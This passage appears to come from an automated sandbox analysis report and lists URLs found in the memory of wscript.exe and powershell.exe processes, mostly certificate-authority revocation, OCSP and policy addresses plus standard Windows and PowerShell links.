        Source: wscript.exe, 00000000.00000003.1652842936.00000279AEF86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://certs.oaticerts.com/repository/OATICA2.crl
        Source: wscript.exe, 00000000.00000003.1652842936.00000279AEF86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://certs.oaticerts.com/repository/OATICA2.crt08
        Source: wscript.exe, 00000000.00000003.1652912031.00000279AEFA6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1652842936.00000279AEF86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cps.chambersign.org/cps/chambersignroot.html0
        Source: wscript.exe, 00000000.00000003.1652963346.00000279AEF76000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cps.chambersign.org/cps/chambersroot.html0
        Source: wscript.exe, 00000000.00000003.1652842936.00000279AEF86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cps.siths.se/sithsrootcav1.html0
        Source: wscript.exe, 00000000.00000003.1652756546.00000279AF063000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.certigna.fr/certignarootca.crl01
        Source: wscript.exe, 00000000.00000003.1652912031.00000279AEFA6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1652842936.00000279AEF86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.chambersign.org/chambersignroot.crl0
        Source: wscript.exe, 00000000.00000003.1652963346.00000279AEF76000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.chambersign.org/chambersroot.crl0
        Source: wscript.exe, 00000000.00000003.1653129148.00000279AEF29000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
        Source: wscript.exe, 00000000.00000003.1653057324.00000279AEF3E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.defence.gov.au/pki0
        Source: wscript.exe, 00000000.00000003.1652756546.00000279AF063000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.dhimyotis.com/certignarootca.crl0
        Source: wscript.exe, 00000000.00000003.1652963346.00000279AEF6F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
        Source: powershell.exe, 00000004.00000002.2007607126.0000000007AA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft
        Source: wscript.exe, 00000000.00000003.1652928103.00000279AEF7F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.oces.trust2408.com/oces.crl0
        Source: wscript.exe, 00000000.00000003.1653057324.00000279AEF3E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.postsignum.cz/crl/psrootqca4.crl02
        Source: wscript.exe, 00000000.00000003.1653057324.00000279AEF3E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.postsignum.eu/crl/psrootqca4.crl0
        Source: wscript.exe, 00000000.00000003.1652842936.00000279AEF86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.securetrust.com/SGCA.crl0
        Source: wscript.exe, 00000000.00000003.1653014801.00000279AEF4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.securetrust.com/STCA.crl0
        Source: wscript.exe, 00000000.00000003.1652842936.00000279AEF86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ssc.lt/root-a/cacrl.crl0
        Source: wscript.exe, 00000000.00000003.1652842936.00000279AEF86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ssc.lt/root-b/cacrl.crl0
        Source: wscript.exe, 00000000.00000003.1652756546.00000279AF063000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ssc.lt/root-c/cacrl.crl0
        Source: wscript.exe, 00000000.00000003.1653111726.00000279AEF31000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl0
        Source: wscript.exe, 00000000.00000003.1653057324.00000279AEF3E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl1.comsign.co.il/crl/comsignglobalrootca.crl0
        Source: wscript.exe, 00000000.00000003.1653057324.00000279AEF3E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl2.postsignum.cz/crl/psrootqca4.crl01
        Source: wscript.exe, 00000000.00000002.1681356282.00000279AD05D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1679408383.00000279AD022000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1680693920.00000279AD05D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
        Source: wscript.exe, 00000000.00000002.1681356282.00000279AD05D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1679408383.00000279AD022000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1680693920.00000279AD05D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
        Source: wscript.exe, 00000000.00000003.1662409811.00000279AEFA2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1663388623.00000279AEFA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?7b8fdd9bb8
        Source: wscript.exe, 00000000.00000003.1652994852.00000279AEF67000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fedir.comsign.co.il/cacert/ComSignAdvancedSecurityCA.crt0
        Source: wscript.exe, 00000000.00000003.1652994852.00000279AEF67000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fedir.comsign.co.il/crl/ComSignAdvancedSecurityCA.crl0
        Source: wscript.exe, 00000000.00000003.1653465992.00000279AEF14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fedir.comsign.co.il/crl/ComSignSecuredCA.crl0
        Source: wscript.exe, 00000000.00000003.1653057324.00000279AEF3E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fedir.comsign.co.il/crl/comsignglobalrootca.crl0;
        Source: wscript.exe, 00000000.00000003.1653014801.00000279AEF4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://http.fpki.gov/fcpca/caCertsIssuedByfcpca.p7c0
        Source: powershell.exe, 00000001.00000002.2218474708.0000024A90076000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2003727475.000000000605E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
        Source: wscript.exe, 00000000.00000003.1653014801.00000279AEF4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.accv.es0
        Source: wscript.exe, 00000000.00000003.1652994852.00000279AEF67000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.ncdc.gov.sa0
        Source: wscript.exe, 00000000.00000003.1653014801.00000279AEF4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.pki.gva.es0
        Source: wscript.exe, 00000000.00000003.1653177020.00000279AD0D3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1652842936.00000279AEF86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.suscerte.gob.ve0
        Source: powershell.exe, 00000004.00000002.2000284208.0000000005145000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
        Source: wscript.exe, 00000000.00000003.1653221177.00000279AEF1A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pki.digidentity.eu/validatie0
        Source: wscript.exe, 00000000.00000003.1652756546.00000279AF063000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pki.registradores.org/normativa/index.htm0
        Source: wscript.exe, 00000000.00000003.1652963346.00000279AEF6F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1652842936.00000279AEF86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://policy.camerfirma.com0
        Source: wscript.exe, 00000000.00000003.1653014801.00000279AEF4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://postsignum.ttc.cz/crl/psrootqca2.crl0
        Source: wscript.exe, 00000000.00000003.1653014801.00000279AEF4A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1653177020.00000279AD0D3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1652842936.00000279AEF86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://repository.swisssign.com/0
        Source: wscript.exe, 00000000.00000002.1681356282.00000279AD0A1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1680693920.00000279AD0A1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1652064776.00000279AD0A4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1679408383.00000279AD0A1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1652129352.00000279AD0A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://s.symcb.com/universal-root.crl0
        Source: wscript.exe, 00000000.00000002.1681356282.00000279AD0A1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1680693920.00000279AD0A1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1679408383.00000279AD0A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://s.symcd.com
        Source: wscript.exe, 00000000.00000003.1652064776.00000279AD0A4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1652129352.00000279AD0A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://s.symcd.com06
        Source: powershell.exe, 00000001.00000002.2117543638.0000024A80001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
        Source: wscript.exe, 00000000.00000003.1653193135.00000279AEF25000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sertifikati.ca.posta.rs/crl/PostaCARoot.crl0
        Source: wscript.exe, 00000000.00000003.1653014801.00000279AEF4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://trustcenter-crl.certificat2.com/Keynectis/KEYNECTIS_ROOT_CA.crl0
        Source: wscript.exe, 00000000.00000002.1681356282.00000279AD0A1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1681356282.00000279AD05D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1680693920.00000279AD0A1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1679408383.00000279AD022000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1652064776.00000279AD0A4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1679408383.00000279AD0A1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1680693920.00000279AD05D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1652129352.00000279AD0A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
        Source: wscript.exe, 00000000.00000002.1681356282.00000279AD0A1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1681356282.00000279AD05D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1680693920.00000279AD0A1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1679408383.00000279AD022000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1652064776.00000279AD0A4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1679408383.00000279AD0A1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1680693920.00000279AD05D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1652129352.00000279AD0A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
        Source: wscript.exe, 00000000.00000002.1681356282.00000279AD0A1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1681356282.00000279AD05D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1680693920.00000279AD0A1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1679408383.00000279AD022000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1652064776.00000279AD0A4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1679408383.00000279AD0A1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1680693920.00000279AD05D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1652129352.00000279AD0A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-ocsp.ws.symantec.com0;
        Source: wscript.exe, 00000000.00000003.1652994852.00000279AEF67000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://web.ncdc.gov.sa/crl/nrcacomb1.crl0
        Source: wscript.exe, 00000000.00000003.1652994852.00000279AEF67000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://web.ncdc.gov.sa/crl/nrcaparta1.crl
        Source: wscript.exe, 00000000.00000003.1653193135.00000279AEF25000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1652994852.00000279AEF67000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.acabogacia.org/doc0
        Source: wscript.exe, 00000000.00000003.1652994852.00000279AEF67000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.acabogacia.org0
        Source: wscript.exe, 00000000.00000003.1653014801.00000279AEF4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1.crt0
        Source: wscript.exe, 00000000.00000003.1653014801.00000279AEF4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crl0
        Source: wscript.exe, 00000000.00000003.1653014801.00000279AEF4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es/legislacion_c.htm0U
        Source: wscript.exe, 00000000.00000003.1653014801.00000279AEF4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es00
        Source: wscript.exe, 00000000.00000003.1653057324.00000279AEF6D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1653014801.00000279AEF6D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1652994852.00000279AEF67000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.agesic.gub.uy/acrn/acrn.crl0)
        Source: wscript.exe, 00000000.00000003.1653057324.00000279AEF6D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1653014801.00000279AEF6D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1652994852.00000279AEF67000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.agesic.gub.uy/acrn/cps_acrn.pdf0
        Source: wscript.exe, 00000000.00000003.1652785972.00000279AF073000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ancert.com/cps0
        Source: wscript.exe, 00000000.00000003.1652842936.00000279AEF86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.anf.es
        Source: wscript.exe, 00000000.00000003.1653193135.00000279AEF2C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1653129148.00000279AEF29000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.anf.es/AC/RC/ocsp0c
        Source: wscript.exe, 00000000.00000003.1652842936.00000279AEF86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.anf.es/es/address-direccion.html
        Source: powershell.exe, 00000004.00000002.2000284208.0000000005145000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
        Source: wscript.exe, 00000000.00000003.1653193135.00000279AEF25000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ca.posta.rs/dokumentacija0h
        Source: wscript.exe, 00000000.00000003.1653237969.00000279AEF22000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1653221177.00000279AEF1A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1653111726.00000279AEF31000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.cert.fnmt.es/dpcs/0
        Source: wscript.exe, 00000000.00000003.1653465992.00000279AEF14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.certeurope.fr/reference/pc-root2.pdf0
        Source: wscript.exe, 00000000.00000003.1653465992.00000279AEF14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.certeurope.fr/reference/root2.crl0
        Source: wscript.exe, 00000000.00000003.1653111726.00000279AEF31000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.certicamara.com/dpc/0Z
        Source: wscript.exe, 00000000.00000003.1652963346.00000279AEF6F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.certplus.com/CRL/class1.crl0
        Source: wscript.exe, 00000000.00000003.1652963346.00000279AEF6F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.certplus.com/CRL/class2.crl0
        Source: wscript.exe, 00000000.00000003.1652756546.00000279AF063000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.certplus.com/CRL/class3P.crl0
        Source: wscript.exe, 00000000.00000003.1653221177.00000279AEF1A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.certplus.com/CRL/class3TS.crl0
        Source: wscript.exe, 00000000.00000003.1652912031.00000279AEFA6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1652963346.00000279AEF76000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1652842936.00000279AEF86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.chambersign.org1
        Source: wscript.exe, 00000000.00000003.1652994852.00000279AEF67000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.comsign.co.il/cps0
        Source: wscript.exe, 00000000.00000003.1653465992.00000279AEF14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.correo.com.uy/correocert/cps.pdf0
        Source: wscript.exe, 00000000.00000003.1653177020.00000279AD0D3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1652842936.00000279AEF86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.datev.de/zertifikat-policy-bt0
        Source: wscript.exe, 00000000.00000003.1653014801.00000279AEF4A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1652842936.00000279AEF86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.datev.de/zertifikat-policy-int0
        Source: wscript.exe, 00000000.00000003.1652756546.00000279AF063000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1653057324.00000279AEF3E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1652785972.00000279AF073000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.datev.de/zertifikat-policy-std0
        Source: wscript.exe, 00000000.00000003.1653014801.00000279AEF4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.defence.gov.au/pki0
        Source: wscript.exe, 00000000.00000003.1652756546.00000279AF063000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.disig.sk/ca/crl/ca_disig.crl0
        Source: wscript.exe, 00000000.00000003.1652756546.00000279AF063000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.disig.sk/ca0f
        Source: wscript.exe, 00000000.00000003.1653057324.00000279AEF3E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.dnie.es/dpc0
        Source: wscript.exe, 00000000.00000003.1652756546.00000279AF063000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1652809745.00000279AF07C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1652785972.00000279AF073000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.e-me.lv/repository0
        Source: wscript.exe, 00000000.00000003.1652756546.00000279AF063000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.e-szigno.hu/RootCA.crl
        Source: wscript.exe, 00000000.00000003.1652756546.00000279AF063000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.e-szigno.hu/RootCA.crt0
        Source: wscript.exe, 00000000.00000003.1652756546.00000279AF063000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.e-szigno.hu/SZSZ/0
        Source: wscript.exe, 00000000.00000003.1652963346.00000279AEF6F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1653014801.00000279AEF4A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1652756546.00000279AF063000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1652809745.00000279AF07C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1652785972.00000279AF073000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.e-trust.be/CPS/QNcerts
        Source: wscript.exe, 00000000.00000003.1652928103.00000279AEF7F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ecee.gov.pt/dpc0
        Source: wscript.exe, 00000000.00000003.1653111726.00000279AEF31000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.echoworx.com/ca/root2/cps.pdf0
        Source: wscript.exe, 00000000.00000003.1653111726.00000279AEF31000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.eme.lv/repository0
        Source: wscript.exe, 00000000.00000003.1653057324.00000279AEF3E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.firmaprofesional.com/cps0
        Source: wscript.exe, 00000000.00000003.1652912031.00000279AEFA6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1652842936.00000279AEF86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.globaltrust.info0
        Source: wscript.exe, 00000000.00000003.1652912031.00000279AEFA6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1652842936.00000279AEF86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.globaltrust.info0=
        Source: wscript.exe, 00000000.00000003.1652842936.00000279AEF86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ica.co.il/repository/cps/PersonalID_Practice_Statement.pdf0
        Source: wscript.exe, 00000000.00000003.1652756546.00000279AF063000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.informatik.admin.ch/PKI/links/CPS_2_16_756_1_17_3_1_0.pdf0
        Source: wscript.exe, 00000000.00000003.1652842936.00000279AEF86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.oaticerts.com/repository.
        Source: wscript.exe, 00000000.00000003.1653014801.00000279AEF4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.pki.admin.ch/cps/CPS_2_16_756_1_17_3_1_0.pdf09
        Source: wscript.exe, 00000000.00000003.1653111726.00000279AEF31000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.pki.admin.ch/cps/CPS_2_16_756_1_17_3_21_1.pdf0:
        Source: wscript.exe, 00000000.00000003.1652963346.00000279AEF76000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.pki.admin.ch/policy/CPS_2_16_756_1_17_3_21_1.pdf0
        Source: wscript.exe, 00000000.00000003.1653014801.00000279AEF4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.pki.gva.es/cps0
        Source: wscript.exe, 00000000.00000003.1653014801.00000279AEF4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.pki.gva.es/cps0%
        Source: wscript.exe, 00000000.00000003.1652842936.00000279AEF86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.pkioverheid.nl/policies/root-policy-G20
        Source: wscript.exe, 00000000.00000003.1652756546.00000279AF063000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1652785972.00000279AF073000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.pkioverheid.nl/policies/root-policy0
        Source: wscript.exe, 00000000.00000003.1653014801.00000279AEF4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.postsignum.cz/crl/psrootqca2.crl02
        Source: wscript.exe, 00000000.00000003.1653177020.00000279AD0D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadis.bm0
        Source: wscript.exe, 00000000.00000003.1652756546.00000279AF063000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadisglobal.com/cps0
        Source: wscript.exe, 00000000.00000003.1653014801.00000279AEF4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.rcsc.lt/repository0
        Source: wscript.exe, 00000000.00000003.1652842936.00000279AEF86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.sk.ee/cps/0
        Source: wscript.exe, 00000000.00000003.1652842936.00000279AEF86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.sk.ee/juur/crl/0
        Source: wscript.exe, 00000000.00000003.1652756546.00000279AF063000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1652842936.00000279AEF86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ssc.lt/cps03
        Source: wscript.exe, 00000000.00000003.1653177020.00000279AD0D3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1652842936.00000279AEF86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.suscerte.gob.ve/dpc0
        Source: wscript.exe, 00000000.00000003.1653177020.00000279AD0D3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1652842936.00000279AEF86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.suscerte.gob.ve/lcr0#
        Source: wscript.exe, 00000000.00000003.1652994852.00000279AEF67000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.trustcenter.de/crl/v2/tc_class_3_ca_II.crl
        Source: wscript.exe, 00000000.00000003.1653057324.00000279AEF6D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1653014801.00000279AEF6D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1652994852.00000279AEF67000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.uce.gub.uy/acrn/acrn.crl0
        Source: wscript.exe, 00000000.00000003.1653057324.00000279AEF6D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1653014801.00000279AEF6D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1652994852.00000279AEF67000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.uce.gub.uy/informacion-tecnica/politicas/cp_acrn.pdf0G
        Source: wscript.exe, 00000000.00000003.1653014801.00000279AEF4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www2.postsignum.cz/crl/psrootqca2.crl01
        Source: powershell.exe, 00000001.00000002.2117543638.0000024A80001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
        Source: powershell.exe, 00000004.00000002.2003727475.000000000605E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
        Source: powershell.exe, 00000004.00000002.2003727475.000000000605E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
        Source: powershell.exe, 00000004.00000002.2003727475.000000000605E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
        Source: wscript.exe, 00000000.00000003.1653193135.00000279AEF2C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1653129148.00000279AEF29000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://crl.anf.es/AC/ANFServerCA.crl0
        Source: wscript.exe, 00000000.00000002.1681356282.00000279AD0A1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1680693920.00000279AD0A1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1679408383.00000279AD0A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d.symc0
